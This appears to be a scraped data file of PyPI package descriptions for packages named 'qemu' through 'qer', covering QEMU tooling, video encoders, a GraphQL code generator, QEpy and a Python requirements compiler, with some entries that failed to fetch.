more information."} +{"package": "qemu", "pacakge-description": "This is just a placeholder, registered in good faith on behalf of the\nQEMU project. I authorize any surrender of this account, package, or\nproject name to any Board Member representing QEMU to the Software\nFreedom Conservancy."} +{"package": "qemu-affinity", "pacakge-description": "qemu-affinityis a tool to easily pin certainQEMUthreads to select CPU cores.Getting StartedInstallingThis will install theqemu-affinitycommand to/usr/local/bin.Frompippip install qemu-affinityFrom sourceClone the repo and run:python setup.py installRequirementsqemu-affinityrequires Python 3.Noteqemu-systeminstances must be started with the-name,debug-threads=onargument forqemu-affinityto correctly identify and set the affinity of specificQEMUthreads.Usageqemu-affinity qemu-system-pid\n [-h] [--dry-run] [-v] [-p [AFFINITY]]\n [-q AFFINITY [AFFINITY ...]]\n [-k THREAD_AFFINITY [THREAD_AFFINITY ...]]\n [-i THREAD_AFFINITY [THREAD_AFFINITY ...]]\n [-w THREAD_AFFINITY [THREAD_AFFINITY ...]]\n [-t THREAD_AFFINITY [THREAD_AFFINITY ...]]Positional argumentsqemu-system-pidPID of the qemu-system processOptional arguments-h,--helpshow this help message and exit--dry-rundon\u2019t modify thread affinity values (useful with-v)-v,--verbosebe verbose-pAFFINITY,--process-affinityAFFINITYsetqemu-systemprocess affinity (and default for new threads)-qAFFINITY [AFFINITY...],--qemu-affinityAFFINITY [AFFINITY...]setqemu-systemthread affinity (partial name selectors not allowed)-kTHREAD_AFFINITY [THREAD_AFFINITY...],--kvm-affinityTHREAD_AFFINITY [THREAD_AFFINITY...]set KVM (CPU /KVM) thread affinity-iTHREAD_AFFINITY [THREAD_AFFINITY...],--io-affinityTHREAD_AFFINITY [THREAD_AFFINITY...]set IO object (IO ) thread affinity-wTHREAD_AFFINITY [THREAD_AFFINITY...],--worker-affinityTHREAD_AFFINITY [THREAD_AFFINITY...]set qemu worker (worker) thread affinity (partial name selectors not allowed, only positional)-tTHREAD_AFFINITY [THREAD_AFFINITY...],--thread-affinityTHREAD_AFFINITY [THREAD_AFFINITY...]set arbitary () thread affinityAFFINITYis anaffinity-specandTHREAD_AFFINITYcan be one of:affinity-specselector:affinity-specWhereaffinity-specis a CPU number, a range (inclusive) of CPU numbers separated by a\ndash (-), or a comma-delimited (,) list of CPU numbers or ranges.For example:0specifies CPU 00,1,2,3specifies CPU 0, 1, 2 and 30-3same as above0,2-4,6specifies CPU 0, 2, 3, 4 and 6and, whereselectoris one of:*, meaning all threadspartial-namefor-k(CPU /KVM) and-i(IO )namefor-tThe first variant,affinity-spec, selects threads based on argument position.e.g.,-k0,4 1,5 2,6 3,7pins the first KVM thread to CPUs 0 and 4, the second KVM thread to CPUs 1 and 5, and so on.The second variant,selector:affinity-spec, selects threads byselector, which is a partial name or wildcard.\nKVM threads have numeric names (0,1,2, etc.).\nIO threads have user-supplied names (-objectiothread,id=name).e.g.,-k2:2,6-imyiothread:7 *:0pins KVM thread2(akaCPU 2/KVM) to CPUs 2 and 6, IO threadmyiothread(akaIO myiothread) to CPU 7, and all remaining IO threads to\nCPU 0.The two variants can be combined.e.g.,-k0,4 *:2,6pins the first KVM thread to CPUs 0 and 4,and all remaining KVM threads to CPUs 2 and 6.Known Limitationsthe built-in help (qemu-affinity-h) lists theqemu-system-pidargument last in the list which may conflict with multi-argument parameters\nsuch as-q,-k,-i,-w, and-t.Either specifyqemu-system-pidat the beginning of the argument list or use--to separate the multi-argument parameters from the positional parameters.-t/--thread-affinityonly applies to the first of multiple threads that share an identical name (such as the QEMUworkerthreads).-tis unable to specify different affinities for threads with duplicate names, nor is it able to apply the same affinity value to multiple threads with the same name\n(*applies toallthreads, not just a sub-set).e.g.-tabc:1 abc:2results in an error, and there is no way to set all threads with the name \u201cabc\u201d to the same affinity value.Additionally, there is no way to select the nththread with the same name.e.g.-tabc:1will always select the 1stthread with the name \u201cabc\u201d.Sample UsageThe followingsystemd.service(5)startsQEMUas a daemon and then pins the 4 KVM threads (one for each emulated CPU core) to host CPUs 2, 3, 4 and 5. IO threads and other QEMU worker threads are pinned\nto host CPUs 0 and 1.In this example the host kernel has been configured to isolate cores 2, 3, 4 & 5 so they can be solely utilised byQEMU.[Unit]\nDescription=QEMU virtual machine\nAfter=network.target netctl@br0.service\n\n[Service]\nCPUSchedulingPolicy=rr\n\nType=forking\nPIDFile=/run/qemu_ex.pid\n\nEnvironment=QEMU_AUDIO_DRV=pa\n\nExecStart=/usr/bin/qemu-system-x86_64 -name example-qemu-machine,debug-threads=on -daemonize -pidfile /run/qemu_ex.pid -monitor unix:/tmp/qemu_ex.sock,server,nowait -smp cores=4,threads=1,sockets=1 ...\nExecStartPost=/bin/sh -c 'exec /usr/bin/qemu-affinity $MAINPID -p 0-1 -i *:0-1 -q 0-1 -w *:0-1 -k 2 3 4 5'\n\nExecStop=/bin/sh -c 'while test -d /proc/$MAINPID; do /usr/bin/echo system_powerdown | /usr/bin/socat - UNIX-CONNECT:/tmp/qemu_ex.sock; sleep 60; done'\nTimeoutStopSec=1m\n\n[Install]\nWantedBy=multi-user.target"} +{"package": "qemud", "pacakge-description": "UNKNOWN"} +{"package": "qemu-ga-exec", "pacakge-description": "Command executor for QEMU Windows guestsThis package providesqemu-ga-execscript to run a command inside a Windows\nguest using QEMU Guest Agent (GA). User must set up GA socket as described\ninQEMU wiki.usage: qemu-ga-exec [-h] --connect CONNECT [--verbose] [--env NAME=VALUE]\n [--path PATH] [--no-default-path] [--no-default-env]\n COMMAND [COMMAND ...]\n\nCommand executor for QEMU Windows guests.\n\npositional arguments:\n COMMAND guest command\n\noptional arguments:\n -h, --help show this help message and exit\n --connect CONNECT, -c CONNECT\n virtio-serial Unix socket path\n --verbose, -v increase output verbosity\n --env NAME=VALUE, -e NAME=VALUE\n guest environment variable\n --path PATH, -p PATH guest PATH component\n --no-default-path, -P\n do not prepend PATH with system folders\n --no-default-env, -E do not prepend environment with default valuesThe script requires Python 3 with standard library only, as it utilizesQEMU GA protocol.\nLicense is MIT."} +{"package": "qemu.qmp", "pacakge-description": "Welcome!qemu.qmpis aQEMU Monitor Protocol(\u201cQMP\u201d) library written in Python, usingasyncio. It is used to send\nQMP messages to runningQEMUemulators. It\nrequires Python 3.7+ and has no mandatory dependencies.This library can be used to communicate with QEMU emulators, theQEMU\nGuest Agent(QGA),\ntheQEMU Storage Daemon(QSD), or any other utility or application thatspeaks QMP.This library makes as few assumptions as possible about the actual\nversion or what type of endpoint it will be communicating with;\ni.e. this library does not contain command definitions and does not seek\nto be an SDK or a replacement for tools likelibvirtorvirsh. It is \u201csimply\u201d the protocol\n(QMP) and not the vocabulary (QAPI). It is up\nto the library user (you!) to know which commands and arguments you want\nto send.Who is this library for?It is firstly for developers of QEMU themselves; as the test\ninfrastructure of QEMU itself needs a convenient and scriptable\ninterface for testing QEMU. This library was split out of the QEMU\nsource tree in order to share a reference version of a QMP library that\nwas usable both within and outside of the QEMU source tree.Second, it\u2019s for those who are developingforQEMU by adding new\narchitectures, devices, or functionality; as well as targeting those who\nare developingwithQEMU, i.e. developers working on integrating QEMU\nfeatures into other projects such as libvirt, KubeVirt, Kata Containers,\netc. Occasionally, using existing virtual-machine (VM) management stacks\nthat integrate QEMU+KVM can make developing, testing, and debugging\nfeatures difficult. In these cases, having more \u2018raw\u2019 access to QEMU is\nbeneficial. This library is for you.Lastly, it\u2019s for power users who already use QEMU directly without the\naid of libvirt because they require the raw control and power this\naffords them.Who isn\u2019t this library for?It is not designed for anyone looking for a turn-key solution for VM\nmanagement. QEMU is a low-level component that resembles a particularly\nimpressive Swiss Army knife. This library does not manage that\ncomplexity and is largely \u201cVM-ignorant\u201d. It\u2019s not a replacement for\nprojects likelibvirt,virt-manager,GNOME Boxes, etc.InstallingThis package can be installed from PyPI with pip:> pip3 install qemu.qmpUsageLaunch QEMU with a monitor, e.g.:> qemu-system-x86_64 -qmp unix:qmp.sock,server=on,wait=offThen, at its simplest, script-style usage looks like this:import asyncio\nfrom qemu.qmp import QMPClient\n\nasync def main():\n qmp = QMPClient('my-vm-nickname')\n await qmp.connect('qmp.sock')\n\n res = await qmp.execute('query-status')\n print(f\"VM status: {res['status']}\")\n\n await qmp.disconnect()\n\nasyncio.run(main())The above script will connect to the UNIX socket located atqmp.sock, query the VM\u2019s runstate, then print it out\nto the terminal:> python3 example.py\nVM status: runningFor more complex usages, especially those that make full advantage of\nmonitoring asynchronous events, refer to theonline documentationor\ntypeimport qemu.qmp; help(qemu.qmp)in your Python terminal of\nchoice.ContributingContributions are quite welcome! Please file bugs using theGitLab\nissue tracker. This\nproject will accept GitLab merge requests, but due to the close\nassociation with the QEMU project, there are some additional guidelines:Please use the \u201cSigned-off-by\u201d tag in your commit messages. Seehttps://wiki.linuxfoundation.org/dcofor more information on this\nrequirement.This repository won\u2019t squash merge requests into a single commit on\npull; each commit should seek to be self-contained (within reason).Owing to the above, each commit sent as part of a merge request\nshould not introduce any temporary regressions, even if fixed later\nin the same merge request. This is done to preserve bisectability.Please associate every merge request with at least oneGitLab issue. This\nhelps with generating Changelog text and staying organized. Thank you\n\ud83d\ude47DevelopingOptional packages necessary for running code quality analysis for this\npackage can be installed with the optional dependency group \u201cdevel\u201d:pip install qemu.qmp[devel].make developcan be used to install this package in editable mode\n(to the current environment)andbring in testing dependencies in one\ncommand.make checkcan be used to run the available tests. Consultmake helpfor other targets and tests that make sense for different\noccasions.Before submitting a pull request, consider runningmakecheck-tox&& makecheck-minreqslocally to spot any issues that will\ncause the CI to fail. These checks use their ownvirtual environmentsand won\u2019t pollute your working\nspace.Stability and VersioningThis package uses a major.minor.microSemVer versioning, with the following additional semantics during\nthe alpha/beta period (Major version 0):This package treats 0.0.z versions as \u201calpha\u201d versions. Each micro\nversion update may change the API incompatibly. Early users are advised\nto pin against explicit versions, but check for updates often.A planned 0.1.z version will introduce the first \u201cbeta\u201d, whereafter each\nmicro update will be backwards compatible, but each minor update will\nnot be. The first beta version will be released after legacy.py is\nremoved, and the API is tentatively \u201cstable\u201d.Thereafter, normalSemVer/PEP440rules will apply; micro updates\nwill always be bugfixes, and minor updates will be reserved for\nbackwards compatible feature changes.Changelog0.0.3 (2023-07-10)This release addresses packaging issues associated with the forthcoming\nrelease of Python 3.12. This release adds Python 3.12 support, drops\nPython 3.6 support, and switches to PEP-517 native packaging.!25:\nDrop Python 3.6 support#30:\nThe read buffer limit has been increased from 256KiB to 10MiB for\nparity with libvirt\u2019s default and to accommodate real-world replies\nthat may exceed the current limit.#29:\nThe connect() call now accepts existing sockets as an \u2018address\u2019,\nallowing for easier use of socketpairs to create client/server pairs.\nThis functionality was revised in!22.!23:\nFix deadlock on disconnect under CPython 3.12.\nSee alsohttps://github.com/python/cpython/issues/104344.!24:\nSwitch to PEP517 native packaging to coincide with Python 3.12\ndropping distutils, setuptools from ensurepip, etc.0.0.2 (2022-08-26)This release primarily fixes development tooling, documentation, and\npackaging issues that have no impact on the library itself. A handful of\nsmall, runtime visible changes were added as polish.#28:\nAdded manual pages and web docs for qmp-shell[-wrap]#27:\nSupport building Sphinx docs from SDist files#26:\nAdd coverage.py support to GitLab merge requests#25:\nqmp-shell-wrap now exits gracefully when qemu-system not found.#24:\nMinor packaging fixes.#10:\nqmp-tui exits gracefully when [tui] extras are not installed.#09:\n__repr__ methods have been improved for all custom classes.#04:\nMutating QMPClient.name now also changes logging messages.0.0.1 (2022-07-20)Initial public release. (API is still subject to change!)"} +{"package": "qemu-rpi-gpio", "pacakge-description": "QEMU RPI GPIOSimulate GPIO in qemu-based Raspberry PiHow it worksThe script (qemu-rpi-gpio) present in this repository interacts with qemu\nusing the built-inqtestprotocol.Wrapping the protocol and interacting with the memory of the guest operating\nsystem, it can set or reset the various GPIOs.Note:Vanilla qemu (5.1.93) will not handle GPIO interrupts, therefore\nloading/sys/class/gpio/gpio$N/directionand waiting for an interrupt\nwill not do anything.To enable interrupt support you'll need to download and compilethis qemu fork.InstallationYou can install the script via pip withpip install qemu-rpi-gpioPrereqisitesYou needsocat,python3andpexpectlibrary to use this\nscript.These can be installed under ubuntu with:sudo apt install python3-pexpect socatTo download raspbian images you'll need 7zipsudo apt install p7zip-fullSetupDownload a raspbian image using./qemu-pi-setup/setup.shAfter this operation, execute the script to load the unix socket and make it\navailable to qemu./qemu-rpi-gpioYou will be prompted to an interactive shell, you can find the commands available\nin theInteracting with gpiossection.In another terminal execute the./qemu-pi-setup/run.shscript, this will execute a virtual\nraspberry pi and attach it to the gpio application.If you close the raspberry pi you can reload the socket using the commandreloadin the qemu-rpi-gpio prompt.Interacting with gpiosFirst of all, you need to export GPIOs in your guest Linux.\nIn a shell on your raspberry pi do:$ sudo su -\n# echo 4 >/sys/class/gpio/export\n# echo in >/sys/class/gpio/directionThe main commands in theqemu-rpi-gpioapplication are:commanddescriptionexampleget $Nget the value of GPIO $Nget 4set $N $Vset the value of GPIO $N to $V (1 or 0)set 4 1You can get the full list of commands usinghelpFor instance, let us set the value of the pre-exported gpio 4(gpio)> set 4 1Now you can read the value of your gpio# cat /sys/class/gpio/value\n1If we set it to zero, it will be immediately reflected in the guest system(gpio)> set 4 0# cat /sys/class/gpio/value\n0"} +{"package": "qemu-runner", "pacakge-description": "QEMU RunnerThis project allows creation of self-contained runner for QEMU with embedded command line arguments. Command line arguments are described in files calledlayers. They are simple INI files that can be combined together to express more complex command lines.>cat./arm_virt.ini[general]engine=qemu-system-arm[machine]@=virt\n\n>cat./ram_2G.ini[general]memory=2G\n\n>qemu_make_runner-l./arm_virt.ini./ram_2G.ini-o./my_runner.pyz\n>python./my_runner.pyz--dry-runkernel.elfarg1arg2# --dry-run to see effective command line instead of running QEMUqemu-system-arm-machinevirt-kernelkernel.elf-append'arg1 arg2'Resultingmy_runner.pyzfile is ZIP file withqemu_runnerpackage and layers. Runner has no extra dependencies, using only Python 3.8+ standard library. QEMU is found according to search precedence described below.Existing runner can be used as base for next runner.Derived runnerwill contain all layers from base runner along with additional layers specified when deriving. This features allows extending base runner with project specific settings without being aware of base settings.>cat./semihosting.ini[semihosting-config]enable=ontarget=native\n\n>python./my_runner.pyz--layers./semihosting.ini--derive./derived.pyz\n>python./derived.pyz--dry-runkernel.elfarg1arg2# --dry-run to see effective command line instead of running QEMUqemu-system-arm-machinevirt-semihosting-configenable=on,target=native-kernelkernel.elf-append'arg1 arg2'Runner provides following features, consult--helpoutput for details:GDB server settingsStart with CPU haltedInspect command lineQEMU search precedenceIf environment variableQEMU_DEVis set, it is used as path to QEMU executable.\nIf environment variableQEMU_DEVis not set but argument--qemuis specified it is used as path to QEMU executable.IfQEMU_DEVis not set, directories are searched for QEMU executable with name specified asenginein\ncombined layer:Directory specified byQEMU_DIRenvironment variableDirectory specified by--qemu-dirargumentEach ancestor directory containing runner, up to the root directory andqemusubdirectory at each level.\nIf runner's path isc:\\dir1\\dir2\\runner.pyz, then following directories are checked:c:\\dir1\\dir2c:\\dir1\\dir2\\qemuc:\\dir1\\c:\\dir1\\qemuc:\\c:\\qemuRepeat step 2 with path of base runner in case of derived runners with--tract-qemuoption.Repeat step 2 with path of passed as--qemu-dirwhen runner was derived.Directories inPATHenvironment variable.On Windows,PATHEXTvariable is used to determine executable extension.Environment variablesSeveral environment variables influences the way QEMU command line is constructed:QEMU_FLAGS- arguments to be added to the QEMU command line during executionQEMU_RUNNER_FLAGS- arguments will be interpreted exactly as if they were added to runner execution.Example:shell>QEMU_FLAGS='-d int'QEMU_RUNNER_FLAGS='--halted'./runner.pyz--dry-runkernel.elf\nqemu-system-arm-machinevirt-dint-S-kernelkernel.elfLayer search precedenceIf layer path is absolute and file is not found, search process fails immediately.If layer path is relative, following directories are searched:Current directoryPackages declaring entry pointqemu_runner_layer_packages(see below)Layer file formatLayersare plain INI files with sections describing QEMU command line. Layers can be combined together allowing user to build bigger command line from simpler building blocks.Values are interpreted as strings unless specified otherwise. When value is described as boolean, values1,yes,trueandonare interpreted as true, values0,no,falseandoffare interpreted as false. Other values are invalid.Section[general]Section[general]describes most common QEMU arguments.Available settings:engine- Name of QEMU executable (e.g.:qemu-system-arm,qemu-system-sparc)cpu- CPU to use in machine (-cpu option)memory- RAM memory size, supports suffixes likeM,G(e.g.20M,4G)gdb(boolean) - If true QEMU will be started with gdbserver enabled.gdb_dev- Use specified value as gdbserver listend address. If not used, default QEMU address will be used (tcp::1234at the time this document is written). Note that specifing onlygdb_devdoes not enable gdbserver.halted- Freeze QEMU CPU at startup.Section[name]Each section corresponds to single QEMU argument, e.g. section[machine]corresponds to-machineargument. Value specified as@key will be used as direct argument value (machine name, device type, etc). Remaining arguments will be added as key-value properties (note: foridproperty see next section).For example, layer:[machine]@=virtusb=ongic-version=2will be translated into-machine virt,usb=on,gic-version=2Section[name:id]As INI file syntax does not allow duplicated section names it is not possible to describe many QEMU arguments without additional syntax:-device,-netdev, etc. These arguments can be differentiated byidproperty which can be specified as section name in formatargument_name:id.For example, layer:[device:d1]@=type1arg1=10arg2=20[device:d2]@=type1arg1=10arg2=20[device:d3]@=type2arg3=10arg4=20translates into:-device type1,id=d1,arg1=10,arg2=20 -device type1,id=d2,arg1=10,arg2=20 -device type2,id=d3,arg3=10,arg4=20Variable resolutionIn sections[name]and[name:id]it is possible to use variables which will be resolved directly before building complete command lines. Variables are in form${VARIABLE_NAME}.Currently available variables:Variable nameValueKERNEL_DIRDirectory containing kernel executable (path is not normalized)How layers are combinedLayers can be combined by applying one layer on top of the another. Operation 'build layerLResultby applying layerLAddon top ofLBase' is defined as follows:[general](exceptcmdline) -LResultcontains all settings from layersLAddandLBase, values inLAddoverride values inLBase[general],cmdlinevalue -LResultcontainscmdlinefromLBasefollowed byLAdd(command line arguments are combined)[name]IfLBasedoes not contain section[name],LResultwill contain section fromLAdd.IfLBasecontains section[name],LResultwill contain[name]with all settings fromLBaseandLAdd, values inLAddoverride values inLBase.[name:id]The same rules as with section[name]applies,idis treated as part of section name.Note:It is not possible to remove section by applying another layerIt is not possible to changeidpropertyIt is not possible to remove argument from sectionPutting layers into pip-installable packageIt is possible to distribute layers as pure Python package that can be installed usingpip. Layers distributes in that way are always visible and there is no need to specify full path to file.Creating package with layers:Create Python packagelayers_pkg, add empty__init__.pyfile.Put layer files intolayers_pkg/layersfolder, it is possible to use more complex directory structure.AddMANIFEST.infile withrecursive-include layers_pkg/layers *.iniin it.Addsetup.pyfile:fromsetuptoolsimportsetupsetup(name='layers-pkg',version='1.0.0',packages=['layers_pkg'],zip_safe=True,include_package_data=True,entry_points={'qemu_runner_layer_packages':['layers_pkg=layers_pkg']# Always use `package_name=package_name`})Create Python package using tools of your choice (python setup.pyorpyproject-build)Package might contain other files, as it is normal Python package.NOTE:This is simplified process of creating Python package, refer to Python documentation for more details.qemu_runnertools usesqemu_runner_layer_packagesentry point to discover all registered packages, from each entry point module portion is used in search for layers."} +{"package": "qencode", "pacakge-description": "Inside this library you will find sample code for creatingvideo transcodingtasks, launching encoding jobs, video clipping and receiving callbacks. Updates are posted on a regular basis and we are open to any improvements or suggestions you may have.Some of the options Qencode offers for transcoding your videos at scale:Resolution8K4K1440p1080p720p480p360p240FeaturesThumbnailsWatermarkingVR / 360 EncodingSubtitles & CaptionsCreate ClipsVideo StitchingS3 StoragePreview ImagesCustom ResolutionCallback URLsCustom PresetsRotateAspect RatioNotificationsCrop VideosTransfer & Storage OptionsS3 QencodeAWSGoogle CloudBackblazeAzureFTPHTTP(S)VPN"} +{"package": "qencode3", "pacakge-description": "Here you will find examples of Qencode solutions using the latest version of python. Some popular examples include launchingvideo encodingjobs through the API, basic testing functionality, and code developed to exhibit a wide range of features that we offer. Please send over any ideas you have to help us improve our solution and continue to provide you with the easiest transcoding solutions on the market.Key features of encoding your videos:Output FormatsHLSMPEG-DASHMP4MXFWebMCodecsH.264 (AVC1)H.265 (HEVC)VP9VP8AV1MPEG-2Input FormatsMP4AVIMOVMKVHLSMPEG\u20112 (TS & PS)MXFASFProResXDCAMDNxFLV...and many more"} +{"package": "qencoder", "pacakge-description": "Cross platform video encoding guiEncoding video is slow. qencoder makes it fast!The most efficient av1 and vp9/vp8 encoders do not scale very well across lots of cpu cores. By intelligently splitting the video into multiple chunks, qencoder allows you encode better videos than with svt in much less time. qencoder is inspired by and uses code fromAv1an, while delivering a more familiar gui experience for Windows and Linux.Simple and easy to useYou don't need to have a deep understanding of how video works to take advantage of qencoder. With extremely easy to use and powerful presets, qencoder is for everyone.Powerful for those who need itqencoder features many useful features which make it a powerful tool. With scene based splitting, qencoder is the first ever gui to take advantage of systems with hundreds of cores. By splitting at the right moments, qencoder ensures your videos do not have any overhead from unneeded keyframes.It also is the first gui capable of boosting dark scenes. Allowing you to use lower q values to avoid nasty artifacts like banding when needed.It allows you to configure the colorspace of both your input and output, to ensure that your hdr video stays hdr.Finally, it supports minimal splitting, the ideal mode for 2 pass vbr encodes. This mode makes as few splits as possible, keeping them all as far apart as possible so that the bitrate stays as variable as possible.Video queueingqencoder is the first gui av1 encoder to support proper video queueing. Setup the perfect encode for your video and add it to a queue. Repeat for as many videos as you want to encode. When you are done, save the queue to a file for later, or run it now with the encode button. If any videos are in the queue, qencoder will encode them.Per Scene EncodingPerSCENEencoding, analogous to automatic per title encoding, lets you optimize your encodes to save space. Each scene can be encoded to target a specific vmaf (perceptual visual quality). Don't pay a cloud company to optimize your encodes, qencoder lets you do it all in house.Free codecsqencoder supports free codecs that can be encoded into webm. This means your videos can be shared and played on any html5 compliant browser. It also means that you do not need to worry about licensing fees or patent violation using it. Your encodes are yours, and should stay that way.Using qencoderWindowsDownload the latest 7zip in the \"releases\" section.LinuxUbuntu:Via pip:First, install ffmpeg, an up to date version of aomenc, and an up to date version of vpxenc. Then install qencoder.sudo apt update\nsudo apt install python-pip vpx-tools aom-tools ffmpeg\npip install qencoderArch:It's recommended that you install it from the aur:https://aur.archlinux.org/packages/qencoder/Others/Manual installation:Git clone this repository:git clone https://github.com/natis1/qencodercd qencoderThen install ffmpeg and an up-to-date version of the aom encoder (for instance aomenc-git, on arch)Then install the python requirements:pip install -r requirements.txtThen run it with./qenc.pyLegal noteapp.ico modified from Wikimedia Commons by Videoplasty.com, CC-BY-SA 4.0pav1n.py contains code created by Master of Zen among others, originally licensed asMITand relicensed as gplv3 for the version within this project."} +{"package": "qenerate", "pacakge-description": "Qenerate is a Code Generator for GraphQL Query and Fragment Data Classes. Documentation is athttps://github.com/app-sre/qenerate."} +{"package": "qenerate-custom", "pacakge-description": "Fork of qenerateYou're probably not looking for this package.\nOriginal:https://github.com/app-sre/qenerateChangesPutDEFINITIONin generated fragment files tooAllow fields withskiporincludeto be omitted from the query responseqenerateqenerateis a pluggable code generator for GraphQL Query and Fragment Data Classes.\nIt works hand in hand with GraphQL clients likegql.\nClients like gql return nested untyped dictionaries as result to a query.qenerategenerated classes easily transform these nested untyped dictionaries into concrete classes.qenerateitself is not a GraphQL client and solely focuses on generating code\nfor transforming untyped dictionaries into concrete types.InstallationReleasesare published on pypi.pipinstallqenerateUsageIntrospectionIn a first step we must obtain the GQL schema in the form of an introspection query:qenerateintrospectionhttp://my-gql-instance:4000/graphql>introspection.jsonTheintrospection.jsonis used in a next step to map concrete types to your queries and fragments.Code Generationqeneratecode-iintrospection.jsondir/to/gql/filesAnintrospection.jsonand a (nested) directory holding all your*.gqlfiles are given.qeneratethen generates data classes for every*.gqlfile it encounters\nwhile traversing the given directory.qenerateexpects that a.gqlfile contains exactly onequery,mutationorfragmentdefinition.Note, that the given directory and everygql.file in it share the same scope.\nI.e., within this scope fragment and query names must be unique. Further, you can\nfreely use any fragment within queries, as long as the fragment is defined somewhere\nwithin the scope (directory).Example for Single QuerySingle queryand itsgenerated classes.Example for Query using a FragmentWe define a re-usablefragmentwhich results in the following\ngeneratedre-usable data classes.The fragment is used in aqueryand imported\nin thegenerated python file.More Examplesqenerateis actively used in our qontract-reconcile project. There you can find a lot ofexampleson how generated classes look like in more detail.Pluginsqeneratefollows a plugin based approach. I.e., multiple code generators are supported.\nChoosing a code generator is done inside the query file, e.g., the following example will\ngenerate data classes using thepydantic_v1plugin:# qenerate: plugin=pydantic_v1query{...}By choosing a plugin based approach,qeneratecan extent its feature set creating new plugins\nwhile at the same time keeping existing plugins stable and fully backwards compatible.Currently available plugins are:pydantic_v1for generatingPydanticdata classesFeature Flagsqenerateleverages feature flags to configure the behavior of the generator. Feature flags are passed to\nthe generator via comments in your .gql definition file.Plugin# qenerate: plugin=This feature flag tellsqeneratewhich plugin it should use to generate the code for the given definition.Custom Type MappingYou can tell qenerate to map a primitive GQL type (a.k.a. Scalar) to something that you want. This can be handy if your codebase expects other primitive datatypes like, e.g.,strinstead ofJsonordatetime. This can be especially useful for custom GQL primitives.# qenerate: map_gql_scalar=JSON -> strThe above will tell qenerate to map the GQLJSONtype tostrinstead of pydantic'sJson. You can also map multiple types, e.g.,# qenerate: map_gql_scalar=JSON -> str# qenerate: map_gql_scalar=DateTime -> strNaming Collision Strategy# qenerate: naming_collision_strategy=[PARENT_CONTEXT | ENUMERATE]This feature flag tellsqeneratehow to deal with naming collisions in classes.\nIn GraphQL it is easy to query the same object in a nested fashion, which results\nin re-definitions of the type. We call this naming collision. A naming collision\nstrategy defines how to adjust recurring names to make them unique.PARENT_CONTEXTThis is the default strategy if nothing else is specified. It uses the name of the\nparent node in the query as a prefix.ENUMERATEThis strategy adds the number of occurrences of this name as a suffix.However, in most cases it might be cleaner to define a re-usable fragment instead of\nrelying on a collision strategy. Here are somefragment examples.LimitationsOverlapping propertiesAs of nowqeneratedoes not support operations with overlapping properties. E.g.,fragmentMyFragmentonNamespace{b{ef}}queryMyQuery{namespaces{a...MyFragmentb{c# This overlapps with properties in MyFragment}}}The above is valid GQL syntax and will merge properties defined inMyFragmentandb { c }intob {c,e,f}.\nHowever, currentlyqeneratewill fail to deduce proper base classes for these overlapps.\nWork on this is being conducted in#77.DevelopmentCICI happens on anapp-sreowned Jenkins instance.ReleasesPR ChecksBuild and Dependency Managementqenerateusespoetryas build and dependency management system.Formattingqenerateusesrufffor code checking and formatting.Generating setup.pypipinstallpoetry2setup\npoetry2setup.ArchitectureThe architecture is described in more detail inthis document."} +{"package": "qeng-admin-api", "pacakge-description": "Administrative API for the QEng quest engine"} +{"package": "qEngineApi", "pacakge-description": "No description available on PyPI."} +{"package": "qe-obelix", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qep-flowback", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qep-flowback-psharma", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qep-flowback-psharma-beta", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qep-info-objects", "pacakge-description": "# Example PackageThis is a simple example package. You can use\n[Github-flavored Markdown](https://guides.github.com/features/mastering-markdown/)\nto write your content."} +{"package": "qep-info-objects-test", "pacakge-description": "# Example PackageThis is a simple example package. You can use\n[Github-flavored Markdown](https://guides.github.com/features/mastering-markdown/)\nto write your content."} +{"package": "qepler", "pacakge-description": "QeplerCreated by Abzu."} +{"package": "qepseudos", "pacakge-description": "qepseudosPseudopotentials for quantum-espresso calculations.Usageimport qepseudosfor \"PBE\"pseudo_dir = qepseudos.pbedirandpseudopotentials = qepseudos.names.Names of all files are given as [Element_Symbol].UPF"} +{"package": "qepy", "pacakge-description": "QEpy - Quantum ESPRESSO in PythonQEpyturns Quantum ESPRESSO (QE) into a Python DFT engine for nonstandard workflows.Contributors and fundingThe Quantum-Multiscale collaborationMain author:Xuecheng Shao(Rutgers)Oliviero Andreussi (UNT), Davide Ceresoli (CNR, Italy), Matthew Truscott (UNT), Andrew Baczewski (Sandia), Quinn Campbell (Sandia), Michele Pavanello (Rutgers)Thanks to ...The Quantum ESPRESSO developers for the QE codebaseNSF for funding the Quantum-Multiscale collaborationRequirementsPython(>=3.7)NumPy(>=1.18.0)f90wrap(>=0.2.8)Quantum ESPRESSO(=6.5)Compiler (GNU(Recommended) orIntel)InstallationPipUsing pip can easy install the release version (serial) of QEpy fromPyPI.python-mpipinstallqepySourceQEAll source codes should be compiled with the-fPICcompuiler option. Add-fPICto the configuration options. E.g.,./configureCFLAGS=-fPICFFLAGS=-fPICtry_foxflags=-fPICMPIF90=mpif90makeallexportqedir=`pwd`QEpygitclone--recurse-submoduleshttps://gitlab.com/shaoxc/qepy.gitoldxml=yesldau=yestddft=yespython-mpipinstall-U./qepyManual and TutorialsSeeQEpy's websitefor details."} +{"package": "qe-qr4-install", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qer", "pacakge-description": "Qer Python Requirements CompilerQer is a Python work-in-progress requirements compiler geared toward large Python projects. It allows you to:Produce an output file consisting of fully constrained exact versions of your requirementsIdentify sources of constraints on your requirementsConstrain your output requirements using requirements that will not be included in the outputSave distributions that are downloaded while compilingUse a current solution as a source of requirements. In other words, you can easily compile a subset from an existing solution.Why use it?pip-toolsis the defacto requirements compiler for Python, but is missing some important features.Does not allow you to use constraints that are not included in the final outputProvides no tools to track down where conflicting constraints originateCannot treat source directories recursively as package sourcesQer has these features, making it an effective tool for large Python projects.This situation is very common:You have a project with requirementsrequirements.txtand test requirementstest-requirements.txt. You want\nto produce a fully constrained output ofrequirements.txtto use to deploy your application. Easy, right? Just\ncompilerequirements.txt. However, if your test requirements will in any way constrain packages you need,\neven those needed transitively, it means you will have tested with different versions than you\u2019ll ship.For this reason, you can user Qer to compilerequirements.txtusingtest-requirements.txtas constraints.The BasicsInstall and runQer can be simply installed by running:pip install qerTwo entrypoint scripts are provided:req-compile ... [--constraints constraint_file] [--index-url https://...]\nreq-hash ... Producing output requirementsTo produce a fully constrained set of requirements for a given number of input requirements files, pass requirements\nfiles to req-compile:> cat requirements.txt\nastroid>=2.0.0\nisort >= 4.2.5\nmccabe\n\n> req-compile 